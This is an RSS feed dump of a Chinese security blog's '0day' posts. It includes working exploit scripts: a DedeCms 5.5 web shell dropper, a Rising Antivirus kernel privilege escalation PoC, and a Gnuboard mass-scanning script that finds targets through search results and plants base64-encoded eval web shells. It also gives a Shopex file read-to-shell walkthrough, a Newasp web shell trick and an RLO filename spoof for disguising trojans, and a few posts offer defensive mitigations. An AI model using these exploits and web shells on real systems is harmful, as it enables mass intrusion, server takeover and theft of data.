Chinadu's Blog » 0day http://www.4shell.org 关注网络安全 Fri, 10 Feb 2012 03:53:40 +0000 en hourly 1 http://wordpress.org/?v=3.3.1 你还敢执行txt文件吗?Windows 0day http://www.4shell.org/archives/1777.html http://www.4shell.org/archives/1777.html#comments Thu, 10 Jun 2010 05:27:06 +0000 Chinadu http://www.4shell.org/?p=1777 来源:Chinadu`s Blog

http://www.4shell.org/archives/1777.html

其实这个算不上是漏洞也谈不上0day,只能说是一个windows fun罢了。

测试如下:

1.选择任意一个exe文件,鼠标右键选择重命名:



2.选择插入unicode控制字符,选择:RLO Start of right-to-left override

3.重命名文件为:text.exe。你将会发现:

4.双击这个“所谓的txt”看看:

5.执行成功!假如我把这个Md5Checker工具换成txt图标的一个木马呢?你还敢执行这个"所谓的txt"吗?

lol

相关文章

]]> http://www.4shell.org/archives/1777.html/feed 6 橙色预警:PHP PATH_INFO 存在漏洞 http://www.4shell.org/archives/1761.html http://www.4shell.org/archives/1761.html#comments Fri, 21 May 2010 04:49:36 +0000 Chinadu http://www.4shell.org/archives/1761.html PS:其实10年前就爆出了这个漏洞,如今流传开了,估计能引起一场小小的革命,不少大站的源码都要流传出来了。
PHP PATH_INFO 存在漏洞

使用nginx+php组建的网站只要允许上传图片就可能被黑客入侵,直到5.21日凌晨,nginx尚未发布修复该漏洞的补丁;已经有一些网站被黑了,管理员速修复!

测试方法:

Nginx的服务器上传图片访问图片地址,后面加上4shell.php

例如:www.xx.com/upload/201005219527.jpg/4shell.php

临时修补方法,可3选其一

1、设置php.ini的:

cgi.fix_pathinfo为0

重启php。最方便,但修改设置的影响需要自己评估。

2、给nginx的vhost配置添加如下内容,重启nginx。vhost较少的情况下也很方便。

if ( $fastcgi_script_name ~ \..*\/.*php ) {
return 403;
}

3、禁止上传目录解释PHP程序。不需要动webserver,如果vhost和服务器较多,短期内难度急剧上升;建议在vhost和服务器较少的情况下采用。

相关文章

]]> http://www.4shell.org/archives/1761.html/feed 1 Shopex V4.8.4 V4.8.5 0Day 通杀 http://www.4shell.org/archives/1722.html http://www.4shell.org/archives/1722.html#comments Fri, 23 Apr 2010 13:02:08 +0000 Chinadu http://www.4shell.org/archives/1722.html 影响版本: Shopex V4.8.4 V4.8.5
漏洞描述: 文件过滤不严,导致任意文件读取漏洞。
测试代码:

http://www.target.com/shopadmin/index.php?ctl=sfile&act=getDB&p[0]=../../config/config.php

可以连上数据库.

mysql -h1.1..1.1 -uuser -ppass

use yourbasename;

select * from sdb_operators;

得到管理员用户密码./shopadmin/ 登陆

后台拿shell,没有仔细研究.

我测试的站,直接用into outfile 一个shell.

网上有个帖子,说可以爆物理路径.测试不可用.

如果install目录没删.下面这个可以看phpinfo

http://www.target.com/install/svinfo.php?phpinfo=true

另外/home/cache/目录的文件,也是可以爆出来的.

相关文章

]]> http://www.4shell.org/archives/1722.html/feed 0 PDF最新0day http://www.4shell.org/archives/1641.html http://www.4shell.org/archives/1641.html#comments Thu, 01 Apr 2010 05:37:43 +0000 Chinadu http://www.4shell.org/archives/1641.html There's a function within PDF specs to launch executables. Or to run JavaScript. Why do we need these things?

With specs like these, it's no wonder it takes ages for Adobe Reader to boot up and load all the plugins.

It's no wonder there are regular security problems with PDF readers in general.

The perfect example is the "Escape from PDF" demo from Didier Stevens' blog.

Users of Foxit Reader: try opening Didier's demo PDF file. After opening, it will run CMD.EXE on your system; no questions asked. And this is a legitimate PDF file which uses no exploits.

One way to reduce your risk is not to download PDF files from the web to your machine at all. Instead of opening the files on your local machine, you can open them remotely in viewers like Google Docs. This process can be made completely automatic with plugins like gPDF (for Chrome/Opera/Firefox/Iron). Do note that it will only work with PDF files you access in the public web.

Otherwise, our guidance would be to use a PDF reader that's as unpopular as possible. The less users a product has, the less attacks it will attract.

PS:下载demo PDF file运行后会弹出CMD.exe 建议各位使用chrome+Docs PDF/PowerPoint Viewer

相关文章

]]> http://www.4shell.org/archives/1641.html/feed 0 Firefox 3.6 0day被补了 http://www.4shell.org/archives/1632.html http://www.4shell.org/archives/1632.html#comments Wed, 24 Mar 2010 02:03:31 +0000 Chinadu http://www.4shell.org/archives/1632.html Update on Secunia Advisory SA38608

Mozilla was contacted by Evgeny Legerov, the security researcher who discovered the bug referenced in the Secunia report, with sufficient details to reproduce and analyze the issue.  The vulnerability was determined to be critical and could result in remote code execution by an attacker.  The vulnerability has been patched by developers and we are currently undergoing quality assurance testing for the fix.  Firefox 3.6.2 is scheduled to be released March 30th and will contain the fix for this issue.  As always, we encourage users to apply this update as soon as it is available to ensure a safe browsing experience.  Alternatively, users can download Release Candidate builds of Firefox 3.6.2 which contains the fix from here:  https://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/3.6.2-candidates/build3/

Update: To clarify, as originally claimed this issue affects Firefox 3.6 only and not any earlier versions. Thunderbird and SeaMonkey are based on earlier versions of the browser engine and are not affected. People testing “3.7″ development builds should upgrade to 3.7 alpha 3 or the latest nightly build to ensure they have this fix.

相关文章

]]> http://www.4shell.org/archives/1632.html/feed 0 DedeCms v5.5 0day http://www.4shell.org/archives/1615.html http://www.4shell.org/archives/1615.html#comments Wed, 10 Mar 2010 01:53:34 +0000 Chinadu http://www.4shell.org/archives/1615.html 官方暂时没出补丁,不过我估计快了
执行成功会在在data/cache下生成t.php一句话小马
密码t,官方最新GBK和utf-8版本存在此漏洞,
此exp得特点是生产t.php得时候不留日志

<?php

print_r('

+----------------------------------------+

dedecms v5.5 final getwebshell exploit

+----------------------------------------+

');

if ($argc < 3) {

print_r('

+----------------------------------------+

Usage: php '.$argv[0].' host path

host: target server (ip/hostname)

path: path to dedecms

Example:

php '.$argv[0].' localhost /dedecms/

+----------------------------------------+

');

exit;

}

error_reporting(7);

ini_set('max_execution_time', 0);

$host = $argv[1];

$path = $argv[2];

$post_a = 'plus/digg_ajax.php?id=1024e1024&*/fputs(fopen(chr(46).chr(46).chr(47).chr(100).chr(97)

.chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104)

.chr(101).chr(47).chr(116).chr(46).chr(112).chr(104)

.chr(112),chr(119).chr(43)),chr(60).chr(63).chr(112)

.chr(104).chr(112).chr(32).chr(101).chr(118).chr(97)

.chr(108).chr(40).chr(36).chr(95).chr(80).chr(79)

.chr(83).chr(84).chr(91).chr(39).chr(116).chr(39)

.chr(93).chr(41).chr(59).chr(63).chr(62));/*';

$post_b = 'needCode=aa/../../../data/mysql_error_trace';

$shell = 'data/cache/t.php';

get_send($post_a);

post_send('plus/comments_frame.php',$post_b);

$content = post_send($shell,'t=echo tojen;');

if(substr($content,9,3)=='200'){

echo "\nShell Address is:".$host.$path.$shell;

}else{

echo "\nError.";

}

function get_send($url){

global $host, $path;

$message = "GET ".$path."$url HTTP/1.1\r\n";

$message .= "Accept: */*\r\n";

$message .= "Referer: http://$host$path\r\n";

$message .= "Accept-Language: zh-cn\r\n";

$message .= "Content-Type: application/x-www-form-urlencoded\r\n";

$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";

$message .= "Host: $host\r\n";

$message .= "Connection: Close\r\n\r\n";

$fp = fsockopen($host, 80);

if(!$fp){

echo "\nConnect to host Error";

}

fputs($fp, $message);

$back = '';

while (!feof($fp))

$back .= fread($fp, 1024);

fclose($fp);

return $back;

}

function post_send($url,$cmd){

global $host, $path;

$message = "POST ".$path."$url HTTP/1.1\r\n";

$message .= "Accept: */*\r\n";

$message .= "Referer: http://$host$path\r\n";

$message .= "Accept-Language: zh-cn\r\n";

$message .= "Content-Type: application/x-www-form-urlencoded\r\n";

$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";

$message .= "Host: $host\r\n";

$message .= "Content-Length: ".strlen($cmd)."\r\n";

$message .= "Connection: Close\r\n\r\n";

$message .= $cmd;

$fp = fsockopen($host, 80);

if(!$fp){

echo "\nConnect to host Error";

}

fputs($fp, $message);

$back = '';

while (!feof($fp))

$back .= fread($fp, 1024);

fclose($fp);

return $back;

}

?>

相关文章

]]> http://www.4shell.org/archives/1615.html/feed 0 瑞星本地提权通杀利用代码 http://www.4shell.org/archives/1548.html http://www.4shell.org/archives/1548.html#comments Sun, 31 Jan 2010 07:04:42 +0000 Chinadu http://www.4shell.org/archives/1548.html 编译后,运行此程序,可在ring3下直接恢复其ssdt,然后就可以为所欲为了,刚才测试1月28日对瑞星2010版有效,据说也适用于2009和 2008版本

//MY Blog:http://hi.baidu.com/9908006

//MY QQ:165659238

//VC-ConsoleWithApi

#include "stdafx.h"

#include "windows.h"

enum { SystemModuleInformation = 11 };

typedef struct {

ULONG Unknown1;

ULONG Unknown2;

PVOID Base;

ULONG Size;

ULONG Flags;

USHORT Index;

USHORT NameLength;

USHORT LoadCount;

USHORT PathLength;

CHAR ImageName[256];

} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;

typedef struct {

ULONG Count;

SYSTEM_MODULE_INFORMATION_ENTRY Module[1];

} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

HANDLE g_RsGdiHandle = 0 ;

void __stdcall WriteKVM(PVOID Address , ULONG Value)

{

ULONG ColorValue = Value ;

ULONG btr ;

ULONG ColorBuffer = 0 ;

DeviceIoControl(g_RsGdiHandle ,

0x83003C0B,

&ColorValue ,

sizeof(ULONG),

&ColorBuffer ,

sizeof(ULONG),

&btr ,

0

);

DeviceIoControl(g_RsGdiHandle ,

0x83003C0B,

&ColorValue ,

sizeof(ULONG),

Address ,

sizeof(ULONG),

&btr ,

0

);

return ;

}

void AddCallGate()

{

ULONG Gdt_Addr;

ULONG CallGateData[0x4];

ULONG Icount;

__asm

{

push edx

sgdt [esp-2]

pop edx

mov Gdt_Addr , edx

}

__asm

{

push 0xc3

push Gdt_Addr

call WriteKVM

mov eax,Gdt_Addr

mov word ptr[CallGateData],ax

shr eax,16

mov word ptr[CallGateData+6],ax

mov dword ptr[CallGateData+2],0x0ec0003e8

mov dword ptr[CallGateData+8],0x0000ffff

mov dword ptr[CallGateData+12],0x00cf9a00

xor eax,eax

LoopWrite:

mov edi,dword ptr CallGateData[eax]

push edi

mov edi,Gdt_Addr

add edi,0x3e0

add edi,eax

push edi

mov Icount,eax

call WriteKVM

mov eax,Icount

add eax , 0x4

cmp eax,0x10

jnz LoopWrite

}

return ;

}

void IntoR0(PVOID function)

{

WORD Callgt[3];

Callgt[0] = 0;

Callgt[1] = 0;

Callgt[2] = 0x3e3;

__asm

{

call fword ptr[Callgt]

mov eax,esp

mov esp,[esp+4]

push eax

call function

pop esp

push offset ring3Ret

retf

ring3Ret:

nop

}

return ;

}

#pragma pack(1)

typedef struct _IDTR

{

SHORT IDTLimit;

UINT IDTBase;

}IDTR,

*PIDTR,

**PPIDTR;

#pragma pack()

ULONG g_RealSSDT = 0 ;

ULONG ServiceNum = 0 ;

ULONG OrgService [0x1000] ;

ULONG RvaToOffset(IMAGE_NT_HEADERS *NT, ULONG Rva)

{

ULONG Offset = Rva, Limit;

IMAGE_SECTION_HEADER *Img;

WORD i;

Img = IMAGE_FIRST_SECTION(NT);

if (Rva < Img->PointerToRawData)

return Rva;

for (i = 0; i < NT->FileHeader.NumberOfSections; i++)

{

if (Img.SizeOfRawData)

Limit = Img.SizeOfRawData;

else

Limit = Img.Misc.VirtualSize;

if (Rva >= Img.VirtualAddress &&

Rva < (Img.VirtualAddress + Limit))

{

if (Img.PointerToRawData != 0)

{

Offset -= Img.VirtualAddress;

Offset += Img.PointerToRawData;

}

return Offset;

}

}

return 0;

}

#define ibaseDD *(PDWORD)&ibase

DWORD GetHeaders(PCHAR ibase, PIMAGE_FILE_HEADER *pfh, PIMAGE_OPTIONAL_HEADER *poh, PIMAGE_SECTION_HEADER *psh)

{

PIMAGE_DOS_HEADER mzhead=(PIMAGE_DOS_HEADER)ibase;

if ((mzhead->e_magic!=IMAGE_DOS_SIGNATURE)||(ibaseDD[mzhead->e_lfanew]!=IMAGE_NT_SIGNATURE)) return FALSE;

*pfh=(PIMAGE_FILE_HEADER)&ibase[mzhead->e_lfanew];

if (((PIMAGE_NT_HEADERS)*pfh)->Signature!=IMAGE_NT_SIGNATURE) return FALSE;

*pfh=(PIMAGE_FILE_HEADER)((PBYTE)*pfh+sizeof(IMAGE_NT_SIGNATURE));

*poh=(PIMAGE_OPTIONAL_HEADER)((PBYTE)*pfh+sizeof(IMAGE_FILE_HEADER));

if ((*poh)->Magic!=IMAGE_NT_OPTIONAL_HDR32_MAGIC) return FALSE;

*psh=(PIMAGE_SECTION_HEADER)((PBYTE)*poh+sizeof(IMAGE_OPTIONAL_HEADER));

return TRUE;

}

typedef struct {

WORD offset:12;

WORD type:4;

} IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY;

#define RVATOVA(base,offset) ((PVOID)((DWORD)(base)+(DWORD)(offset)))

DWORD FindKiServiceTable(HMODULE hModule,DWORD dwKSDT , PULONG ImageBase)

{

PIMAGE_FILE_HEADER pfh;

PIMAGE_OPTIONAL_HEADER poh;

PIMAGE_SECTION_HEADER psh;

PIMAGE_BASE_RELOCATION pbr;

PIMAGE_FIXUP_ENTRY pfe;

DWORD dwFixups=0,i,dwPointerRva,dwPointsToRva,dwKiServiceTable;

BOOL bFirstChunk;

GetHeaders((PCHAR)hModule,&pfh,&poh,&psh);

if ((poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress) &&

(!((pfh->Characteristics)&IMAGE_FILE_RELOCS_STRIPPED))) {

pbr=(PIMAGE_BASE_RELOCATION)RVATOVA(poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress,hModule);

bFirstChunk=TRUE;

while (bFirstChunk || pbr->VirtualAddress) {

bFirstChunk=FALSE;

pfe=(PIMAGE_FIXUP_ENTRY)((DWORD)pbr+sizeof(IMAGE_BASE_RELOCATION));

for (i=0;i<(pbr->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))>>1;i++,pfe++) {

if (pfe->type==IMAGE_REL_BASED_HIGHLOW) {

dwFixups++;

dwPointerRva=pbr->VirtualAddress+pfe->offset;

dwPointsToRva=*(PDWORD)((DWORD)hModule+dwPointerRva)-(DWORD)poh->ImageBase;

if (dwPointsToRva==dwKSDT)

{

if (*(PWORD)((DWORD)hModule+dwPointerRva-2)==0x05c7)

{

dwKiServiceTable=*(PDWORD)((DWORD)hModule+dwPointerRva+4)-poh->ImageBase;

*ImageBase = poh->ImageBase;

return dwKiServiceTable;

}

}

}

}

*(PDWORD)&pbr+=pbr->SizeOfBlock;

}

}

return 0;

}

DWORD CR0Reg ;

ULONG realssdt ;

void InKerneProc()

{

__asm

{

cli

mov eax, cr0

mov CR0Reg,eax

and eax,0xFFFEFFFF

mov cr0, eax

}

int i;

for (i = 0; i < (int)ServiceNum; i++)

{

*(ULONG*)(*(ULONG*)realssdt + i * sizeof(ULONG)) = OrgService;

}

__asm

{

mov eax, CR0Reg

mov cr0, eax

sti

}

}

int main(int argc, char* argv[])

{

printf("Rising AntiVirus 2008 ~ 2010 n"

"Local Privilege Escalation Vulnerability Proof Of Concept Exploitn 2010-1-27n");

g_RsGdiHandle = CreateFile("[url=]\\.\RSNTGDI[/url]" ,

0,

FILE_SHARE_READ | FILE_SHARE_WRITE ,

0,

OPEN_EXISTING , 0 , 0 );

if (g_RsGdiHandle == INVALID_HANDLE_VALUE)

{

return 0 ;

}

SYSTEM_MODULE_INFORMATION ModuleInfo ;

// Learn the loaded kernel (e.g. NTKRNLPA vs NTOSKRNL), and it's base address

HMODULE hlib = GetModuleHandle("ntdll.dll");

PVOID pNtQuerySystemInformation = GetProcAddress(hlib , "NtQuerySystemInformation");

ULONG infosize = sizeof(ModuleInfo);

__asm

{

push 0

push infosize

lea eax , ModuleInfo

push eax

push 11

call pNtQuerySystemInformation

}

HMODULE KernelHandle ;

LPCSTR ntosname = (LPCSTR)((ULONG)ModuleInfo.Module[0].ImageName + ModuleInfo.Module[0].PathLength);

// Load the kernel image specified

KernelHandle = LoadLibrary(ntosname);

if (KernelHandle == 0 )

{

return 0 ;

}

ULONG KeSSDT = (ULONG)GetProcAddress(KernelHandle , "KeServiceDescriptorTable");

if (KeSSDT == 0 )

{

return 0 ;

}

ULONG ImageBase = 0 ;

ULONG KiSSDT = FindKiServiceTable(KernelHandle , KeSSDT - (ULONG)KernelHandle , &ImageBase);

if (KiSSDT == 0 )

{

return 0 ;

}

KiSSDT += (ULONG)KernelHandle;

ServiceNum = 0x11c ;

ULONG i ;

for (i = 0 ; i < ServiceNum ; i ++)

{

OrgService = *(ULONG*)(KiSSDT + i * sizeof(ULONG)) + (ULONG)ModuleInfo.Module[0].Base - ImageBase;

}

realssdt = KeSSDT - (ULONG)KernelHandle + (ULONG)ModuleInfo.Module[0].Base;

SetThreadAffinityMask(GetCurrentThread () , 0 ) ;

AddCallGate();

IntoR0(InKerneProc);

return 0;

}

相关文章

]]> http://www.4shell.org/archives/1548.html/feed 0 IE 极光0day攻击代码已经全面泄露 WebSense发出安全警告 http://www.4shell.org/archives/1481.html http://www.4shell.org/archives/1481.html#comments Wed, 20 Jan 2010 02:11:42 +0000 Chinadu http://www.4shell.org/archives/1481.html 谷歌,Adobe和其他大公司有针对性的攻击的消息上周已经被披露,最初安全人员们预计是采用恶意的PDF文件进行攻击,但在上周四,微软承认攻击是由一个Internet Explorer中新的安全漏洞引发。
目前已经检测到针对此漏洞的攻击代码正在蔓延,相应的恶意代码页面也已经出现,安全研究机构WebSense今日发出安全警告,以下是技术分析截图:

http://www.4shell.org/wp-content/uploads/images/2010/01/10114162i.png

http://www.4shell.org/wp-content/uploads/images/2010/01/101141n3Z.jpg

http://www.4shell.org/wp-content/uploads/images/2010/01/101142NJW.png

相关文章

]]> http://www.4shell.org/archives/1481.html/feed 0 Gnuboard 0day&Exp http://www.4shell.org/archives/1117.html http://www.4shell.org/archives/1117.html#comments Tue, 22 Sep 2009 06:32:46 +0000 Chinadu http://www.4shell.org/archives/1117.html 利用代码如下:

< ?php
echo" +----------------------------------------------------------------+\r\n";
echo" http://www.t00ls.net\r\n";
echo" +----------------------------------------------------------------+\r\n";
for ($ii=1;$ii<=99;$ii++)
{
$c=(int)$ii*10+1;
$a="web.search.naver.com";
$b="/search.naver?where=webkr&query=bbs/board.php&xc=&docid=0&lang=all&st=s&fd=2&start=".$c."&display=10&&qvt=0&sm=tab_pge";
get($a,$b);

}

function get($host,$file)
{

$fp = fsockopen($host, 80, $errno, $errstr, 10);
if (!$fp) {
echo "SocketError: $errstr ($errno)\n";
return false;
}
$get = "GET $file HTTP/1.1\r\n";
$get .= "Host: $host\r\n";
$get .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5\r\n";
$get .= "Referer: http://$host\r\n";
$get .= "Connection: Close\r\n";
$get .= "Cookie: nsr_acl_nautocomplete=1; NB=GIYTSNJYHE4DKMJX; NNB=AIUHYPM7OXJUS; page_uid=fOL9uloi5UNssbPX/M8sss--100532; _naver_usersession_=SdN7qBY700kAAAKIwME\r\n\r\n";
fwrite($fp, $get);
$response=stream_get_contents($fp);
preg_match_all("(http://[-\w.]+(:\d+)?(/([\w/_.]*)?)?bbs\/board\.php)",$response,$put);
for ($i=0;$i {
$a=(int)$i*3;

fuck($put[0][$a]);
//echo count($put[0]);
//print_r($put[0]);
//fuck($put[0][$i]);

break;

}

fclose($fp);

}

function fuck($ok)
{

$a=preg_replace('(bbs\/board.php)','',$ok);

$file=$a."common.php?g4_path=/tmp%002345";
$xxx=$a."common.php?g4_path=data:;base64,PD9mcHV0cyhmb3BlbignLi9kYXRhL29rLnBocCcsJ3crJyksJzw/cGhwIEBldmFsKCRfUE9TVFtjXSk7ZWNobyAiZnVja3lvdSI7Pz4nKTs/Pg==";
$shell=$a."data/ok.php";
$target=parse_url($ok);
$sitepath=$target['host'];
$xx=@file_get_contents($file);
if(eregi("(Warning)",$xx)&&eregi("(tmp)",$xx))
{
print $sitepath." Vulnerability yes"."\r\n";
@file_get_contents($xxx);
$oksehll=@file_get_contents($shell);
if(!eregi("(\\02345)",$xx))
{
print $sitepath." %00 ok"."\r\n";
}

if (eregi("(fuckyou)",$oksehll))
{

print $shell." pass:c"."\r\n";
$axx="\r\n".$shell;
$sh=fopen('gnuboard.txt',"a+");
fwrite($sh,$axx);
fclose($sh);

}

}
else
{

print $sitepath." Vulnerability no"."\r\n";

}

}

?>

相关文章

]]> http://www.4shell.org/archives/1117.html/feed 0 新云4.0最新0day http://www.4shell.org/archives/1112.html http://www.4shell.org/archives/1112.html#comments Tue, 22 Sep 2009 06:17:32 +0000 Chinadu http://www.4shell.org/archives/1112.html 在密码问题的地方插入加密后的一句话:┼攠數畣整爠煥敵瑳∨≡┩愾
注册成功后连接默认数据库:ask/data/ask_newasp.asa 密码:a

相关文章

]]> http://www.4shell.org/archives/1112.html/feed 0